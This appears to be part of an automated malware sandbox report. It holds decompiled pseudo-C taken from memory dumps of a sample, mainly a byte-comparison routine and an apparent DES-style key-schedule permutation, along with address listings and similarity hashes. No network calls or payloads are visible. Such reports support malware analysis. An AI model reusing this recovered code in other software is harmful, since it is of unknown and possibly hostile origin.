                                                                                                                                                      				signed char _t188;
                                                                                                                                                      				signed char _t189;
                                                                                                                                                      				signed char _t191;
                                                                                                                                                      				signed char _t192;
                                                                                                                                                      				signed int _t198;
                                                                                                                                                      				signed int _t284;
                                                                                                                                                      				void* _t287;
                                                                                                                                                      				void* _t289;
                                                                                                                                                      				void* _t291;
                                                                                                                                                      				void* _t293;
                                                                                                                                                      				void* _t295;
                                                                                                                                                      				void* _t297;
                                                                                                                                                      				void* _t300;
                                                                                                                                                      				void* _t302;
                                                                                                                                                      				void* _t304;
                                                                                                                                                      				void* _t307;
                                                                                                                                                      				void* _t309;
                                                                                                                                                      				void* _t311;
                                                                                                                                                      				void* _t314;
                                                                                                                                                      				void* _t316;
                                                                                                                                                      				void* _t318;
                                                                                                                                                      				void* _t321;
                                                                                                                                                      				void* _t323;
                                                                                                                                                      				void* _t325;
                                                                                                                                                      
                                                                                                                                                      				_t181 = __ecx;
                                                                                                                                                      				_t177 = __eax;
                                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                                                                                                                                      					_t284 = 0;
                                                                                                                                                      					L11:
                                                                                                                                                      					if(_t284 != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t187 =  *(_t177 - 0x18);
                                                                                                                                                      					if(_t187 ==  *(_t181 - 0x18)) {
                                                                                                                                                      						_t284 = 0;
                                                                                                                                                      						L22:
                                                                                                                                                      						if(_t284 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						_t188 =  *(_t177 - 0x14);
                                                                                                                                                      						if(_t188 ==  *(_t181 - 0x14)) {
                                                                                                                                                      							_t284 = 0;
                                                                                                                                                      							L33:
                                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							_t189 =  *(_t177 - 0x10);
                                                                                                                                                      							if(_t189 ==  *(_t181 - 0x10)) {
                                                                                                                                                      								_t284 = 0;
                                                                                                                                                      								L44:
                                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                                                                                                                                      									_t284 = 0;
                                                                                                                                                      									L55:
                                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									_t191 =  *(_t177 - 8);
                                                                                                                                                      									if(_t191 ==  *(_t181 - 8)) {
                                                                                                                                                      										_t284 = 0;
                                                                                                                                                      										L66:
                                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										_t192 =  *(_t177 - 4);
                                                                                                                                                      										if(_t192 ==  *(_t181 - 4)) {
                                                                                                                                                      											_t178 = 0;
                                                                                                                                                      											L78:
                                                                                                                                                      											if(_t178 == 0) {
                                                                                                                                                      												_t178 = 0;
                                                                                                                                                      											}
                                                                                                                                                      											L80:
                                                                                                                                                      											return _t178;
                                                                                                                                                      										}
                                                                                                                                                      										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                                                                                                                                      										if(_t287 == 0) {
                                                                                                                                                      											L70:
                                                                                                                                                      											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                                                                                                                                      											if(_t289 == 0) {
                                                                                                                                                      												L72:
                                                                                                                                                      												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                                                                                                                                      												if(_t291 == 0) {
                                                                                                                                                      													L75:
                                                                                                                                                      													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                                                                                                                                      													if(_t178 != 0) {
                                                                                                                                                      														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                                                                                                                                                      													}
                                                                                                                                                      													goto L78;
                                                                                                                                                      												}
                                                                                                                                                      												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                                                                                                                                                      												if(_t198 == 0) {
                                                                                                                                                      													goto L75;
                                                                                                                                                      												}
                                                                                                                                                      												L74:
                                                                                                                                                      												_t178 = _t198;
                                                                                                                                                      												goto L78;
                                                                                                                                                      											}
                                                                                                                                                      											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                                                                                                                                                      											if(_t198 != 0) {
                                                                                                                                                      												goto L74;
                                                                                                                                                      											}
                                                                                                                                                      											goto L72;
                                                                                                                                                      										}
                                                                                                                                                      										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                                                                                                                                      										if(_t198 != 0) {
                                                                                                                                                      											goto L74;
                                                                                                                                                      										}
                                                                                                                                                      										goto L70;
                                                                                                                                                      									}
                                                                                                                                                      									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                                                                                                                                      									if(_t293 == 0) {
                                                                                                                                                      										L59:
                                                                                                                                                      										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                                                                                                                                      										if(_t295 == 0) {
                                                                                                                                                      											L61:
                                                                                                                                                      											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                                                                                                                                      											if(_t297 == 0) {
                                                                                                                                                      												L63:
                                                                                                                                                      												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                                                                                                                                      												if(_t284 != 0) {
                                                                                                                                                      													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                                                      												}
                                                                                                                                                      												goto L66;
                                                                                                                                                      											}
                                                                                                                                                      											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                                                                                                                                                      											if(_t284 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L63;
                                                                                                                                                      										}
                                                                                                                                                      										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L61;
                                                                                                                                                      									}
                                                                                                                                                      									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L59;
                                                                                                                                                      								}
                                                                                                                                                      								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                                                                                                                                      								if(_t300 == 0) {
                                                                                                                                                      									L48:
                                                                                                                                                      									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                                                                                                                                      									if(_t302 == 0) {
                                                                                                                                                      										L50:
                                                                                                                                                      										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                                                                                                                                      										if(_t304 == 0) {
                                                                                                                                                      											L52:
                                                                                                                                                      											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                                                                                                                                      											if(_t284 != 0) {
                                                                                                                                                      												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L55;
                                                                                                                                                      										}
                                                                                                                                                      										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L52;
                                                                                                                                                      									}
                                                                                                                                                      									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L50;
                                                                                                                                                      								}
                                                                                                                                                      								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L48;
                                                                                                                                                      							}
                                                                                                                                                      							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                                                                                                                                      							if(_t307 == 0) {
                                                                                                                                                      								L37:
                                                                                                                                                      								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                                                                                                                                      								if(_t309 == 0) {
                                                                                                                                                      									L39:
                                                                                                                                                      									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                                                                                                                                      									if(_t311 == 0) {
                                                                                                                                                      										L41:
                                                                                                                                                      										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                                      											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L44;
                                                                                                                                                      									}
                                                                                                                                                      									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L39;
                                                                                                                                                      							}
                                                                                                                                                      							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L37;
                                                                                                                                                      						}
                                                                                                                                                      						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                                                                                                                                      						if(_t314 == 0) {
                                                                                                                                                      							L26:
                                                                                                                                                      							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                                                                                                                                      							if(_t316 == 0) {
                                                                                                                                                      								L28:
                                                                                                                                                      								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                                                                                                                                      								if(_t318 == 0) {
                                                                                                                                                      									L30:
                                                                                                                                                      									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                                      										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L33;
                                                                                                                                                      								}
                                                                                                                                                      								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L30;
                                                                                                                                                      							}
                                                                                                                                                      							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L28;
                                                                                                                                                      						}
                                                                                                                                                      						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                                                                                      						if(_t284 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L26;
                                                                                                                                                      					}
                                                                                                                                                      					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                                                                                                                                      					if(_t321 == 0) {
                                                                                                                                                      						L15:
                                                                                                                                                      						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                                                                                                                                      						if(_t323 == 0) {
                                                                                                                                                      							L17:
                                                                                                                                                      							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                                                                                                                                      							if(_t325 == 0) {
                                                                                                                                                      								L19:
                                                                                                                                                      								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                                      									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L22;
                                                                                                                                                      							}
                                                                                                                                                      							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L19;
                                                                                                                                                      						}
                                                                                                                                                      						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                                                      						if(_t284 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L17;
                                                                                                                                                      					}
                                                                                                                                                      					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                                                      					if(_t284 != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L15;
                                                                                                                                                      				} else {
                                                                                                                                                      					__esi = __dl & 0x000000ff;
                                                                                                                                                      					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                                      					if(__esi == 0) {
                                                                                                                                                      						L4:
                                                                                                                                                      						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                                                      						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                                                      						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                                                      						if(__esi == 0) {
                                                                                                                                                      							L6:
                                                                                                                                                      							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                                                      							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                                                      							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                                                      							if(__esi == 0) {
                                                                                                                                                      								L8:
                                                                                                                                                      								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                                                      								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                                                      								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                                                      								if(__esi != 0) {
                                                                                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L11;
                                                                                                                                                      							}
                                                                                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      							__esi = __edx;
                                                                                                                                                      							if(__edx != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L8;
                                                                                                                                                      						}
                                                                                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      						__esi = __edx;
                                                                                                                                                      						if(__edx != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      					__esi = __edx;
                                                                                                                                                      					if(__edx != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L4;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t178 = _t284;
                                                                                                                                                      				goto L80;
                                                                                                                                                      			}































                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ba09
                                                                                                                                                      0x1000b9f5
                                                                                                                                                      0x1000b9f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b9f9
                                                                                                                                                      0x1000b9d4
                                                                                                                                                      0x1000b9d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b9d8
                                                                                                                                                      0x1000b9b3
                                                                                                                                                      0x1000b9b7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b9b7
                                                                                                                                                      0x1000b915
                                                                                                                                                      0x1000b917
                                                                                                                                                      0x1000b92e
                                                                                                                                                      0x1000b936
                                                                                                                                                      0x1000b938
                                                                                                                                                      0x1000b94f
                                                                                                                                                      0x1000b957
                                                                                                                                                      0x1000b959
                                                                                                                                                      0x1000b970
                                                                                                                                                      0x1000b978
                                                                                                                                                      0x1000b97a
                                                                                                                                                      0x1000b987
                                                                                                                                                      0x1000b987
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b97a
                                                                                                                                                      0x1000b966
                                                                                                                                                      0x1000b96a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b96a
                                                                                                                                                      0x1000b945
                                                                                                                                                      0x1000b949
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b949
                                                                                                                                                      0x1000b924
                                                                                                                                                      0x1000b928
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b88b
                                                                                                                                                      0x1000b88b
                                                                                                                                                      0x1000b88e
                                                                                                                                                      0x1000b892
                                                                                                                                                      0x1000b894
                                                                                                                                                      0x1000b8a7
                                                                                                                                                      0x1000b8a7
                                                                                                                                                      0x1000b8ab
                                                                                                                                                      0x1000b8af
                                                                                                                                                      0x1000b8b1
                                                                                                                                                      0x1000b8c4
                                                                                                                                                      0x1000b8c4
                                                                                                                                                      0x1000b8c8
                                                                                                                                                      0x1000b8cc
                                                                                                                                                      0x1000b8ce
                                                                                                                                                      0x1000b8e1
                                                                                                                                                      0x1000b8e1
                                                                                                                                                      0x1000b8e5
                                                                                                                                                      0x1000b8e9
                                                                                                                                                      0x1000b8eb
                                                                                                                                                      0x1000b8f1
                                                                                                                                                      0x1000b8f4
                                                                                                                                                      0x1000b8f8
                                                                                                                                                      0x1000b8f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8eb
                                                                                                                                                      0x1000b8d4
                                                                                                                                                      0x1000b8d7
                                                                                                                                                      0x1000b8db
                                                                                                                                                      0x1000b8df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8df
                                                                                                                                                      0x1000b8b7
                                                                                                                                                      0x1000b8ba
                                                                                                                                                      0x1000b8be
                                                                                                                                                      0x1000b8c2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8c2
                                                                                                                                                      0x1000b89a
                                                                                                                                                      0x1000b89d
                                                                                                                                                      0x1000b8a1
                                                                                                                                                      0x1000b8a5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b8a5
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                      • Instruction ID: 55efa1d2f927fdc953ecf4dca7577f682825efda3464cd734a0d60072d3cab8c
                                                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                      • Instruction Fuzzy Hash: 12C16373D0EDB3469375C92D406862AEEA2EFC16C132BC7A1DCD43F29DDA269D0196D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 63c1cff88951b8667d274ae00652a9baddfe48e3b2f170758f72ab398b897506
                                                                                                                                                      • Instruction ID: 2b86ebebbdeca26a2c1eb46e2f1d79578d317ad6d63c0af1ccad913a5bda3f46
                                                                                                                                                      • Opcode Fuzzy Hash: 63c1cff88951b8667d274ae00652a9baddfe48e3b2f170758f72ab398b897506
                                                                                                                                                      • Instruction Fuzzy Hash: 76515C757000209FCB09ED38C6E47BA76A3AB9A320F31457DEA03C7795EB789C519661
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 60ebc83629a87436f67ebaafbbe235d528208f463ee8c33f3b1f036cb47a863e
                                                                                                                                                      • Instruction ID: 2f9f1e6a2aece42fcd3e34ac5cac9d877e031cb9bd7ee95541b9e947ecaecab5
                                                                                                                                                      • Opcode Fuzzy Hash: 60ebc83629a87436f67ebaafbbe235d528208f463ee8c33f3b1f036cb47a863e
                                                                                                                                                      • Instruction Fuzzy Hash: CB518D757001209FCB09DD7886A07BA77E3AB8E320F35457DEA03C7789EAB89C519661
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001EDDB() {
                                                                                                                                                      				signed int _t69;
                                                                                                                                                      				void* _t273;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					 *((intOrPtr*)(_t273 - 8)) =  *((intOrPtr*)(_t273 - 8)) + 1;
                                                                                                                                                      					if( *((intOrPtr*)(_t273 - 8)) >= 0x10) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					L2:
                                                                                                                                                      					if( *((intOrPtr*)(_t273 - 8)) < 2 ||  *((intOrPtr*)(_t273 - 8)) == 8 ||  *((intOrPtr*)(_t273 - 8)) == 0xf) {
                                                                                                                                                      						 *(_t273 - 0x10) = ( *(_t273 - 0x10) << 0x00000001 |  *(_t273 - 0x10) >> 0x0000001b) & 0x0fffffff;
                                                                                                                                                      						 *(_t273 - 0xc) = ( *(_t273 - 0xc) << 0x00000001 |  *(_t273 - 0xc) >> 0x0000001b) & 0x0fffffff;
                                                                                                                                                      					} else {
                                                                                                                                                      						 *(_t273 - 0x10) = ( *(_t273 - 0x10) << 0x00000002 |  *(_t273 - 0x10) >> 0x0000001a) & 0x0fffffff;
                                                                                                                                                      						 *(_t273 - 0xc) = ( *(_t273 - 0xc) << 0x00000002 |  *(_t273 - 0xc) >> 0x0000001a) & 0x0fffffff;
                                                                                                                                                      					}
                                                                                                                                                      					L7:
                                                                                                                                                      					 *( *(_t273 + 8)) =  *(_t273 - 0x10) << 0x00000004 & 0x24000000 |  *(_t273 - 0x10) << 0x0000001c & 0x10000000 |  *(_t273 - 0x10) << 0x0000000e & 0x08000000 |  *(_t273 - 0x10) << 0x00000012 & 0x02080000 |  *(_t273 - 0x10) << 0x00000006 & 0x01000000 |  *(_t273 - 0x10) << 0x00000009 & 0x00200000 |  *(_t273 - 0x10) >> 0x00000001 & 0x00100000 |  *(_t273 - 0x10) << 0x0000000a & 0x00040000 |  *(_t273 - 0x10) << 0x00000002 & 0x00020000 |  *(_t273 - 0x10) >> 0x0000000a & 0x00010000 |  *(_t273 - 0xc) >> 0x0000000d & 0x00002000 |  *(_t273 - 0xc) >> 0x00000004 & 0x00001000 |  *(_t273 - 0xc) << 0x00000006 & 0x00000800 |  *(_t273 - 0xc) >> 0x00000001 & 0x00000400 |  *(_t273 - 0xc) >> 0x0000000e & 0x00000200 |  *(_t273 - 0xc) & 0x00000100 |  *(_t273 - 0xc) >> 0x00000005 & 0x00000020 |  *(_t273 - 0xc) >> 0x0000000a & 0x00000010 |  *(_t273 - 0xc) >> 0x00000003 & 0x00000008 |  *(_t273 - 0xc) >> 0x00000012 & 0x00000004 |  *(_t273 - 0xc) >> 0x0000001a & 0x00000002 |  *(_t273 - 0xc) >> 0x00000018 & 0x00000001;
                                                                                                                                                      					 *(_t273 + 8) =  &(( *(_t273 + 8))[1]);
                                                                                                                                                      					_t69 =  *(_t273 - 0xc) >> 0x00000015 & 0x00000002;
                                                                                                                                                      					 *( *(_t273 + 8)) =  *(_t273 - 0x10) << 0x0000000f & 0x20000000 |  *(_t273 - 0x10) << 0x00000011 & 0x10000000 |  *(_t273 - 0x10) << 0x0000000a & 0x08000000 |  *(_t273 - 0x10) << 0x00000016 & 0x04000000 |  *(_t273 - 0x10) >> 0x00000002 & 0x02000000 |  *(_t273 - 0x10) << 0x00000001 & 0x01000000 |  *(_t273 - 0x10) << 0x00000010 & 0x00200000 |  *(_t273 - 0x10) << 0x0000000b & 0x00100000 |  *(_t273 - 0x10) << 0x00000003 & 0x00080000 |  *(_t273 - 0x10) >> 0x00000006 & 0x00040000 |  *(_t273 - 0x10) << 0x0000000f & 0x00020000 |  *(_t273 - 0x10) >> 0x00000004 & 0x00010000 |  *(_t273 - 0xc) >> 0x00000002 & 0x00002000 |  *(_t273 - 0xc) << 0x00000008 & 0x00001000 |  *(_t273 - 0xc) >> 0x0000000e & 0x00000808 |  *(_t273 - 0xc) >> 0x00000009 & 0x00000400 |  *(_t273 - 0xc) & 0x00000200 |  *(_t273 - 0xc) << 0x00000007 & 0x00000100 |  *(_t273 - 0xc) >> 0x00000007 & 0x00000020 |  *(_t273 - 0xc) >> 0x00000003 & 0x00000011 |  *(_t273 - 0xc) << 0x00000002 & 0x00000004 | _t69;
                                                                                                                                                      					 *(_t273 + 8) =  &(( *(_t273 + 8))[1]);
                                                                                                                                                      				}
                                                                                                                                                      				L8:
                                                                                                                                                      				return _t69;
                                                                                                                                                      			}






                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
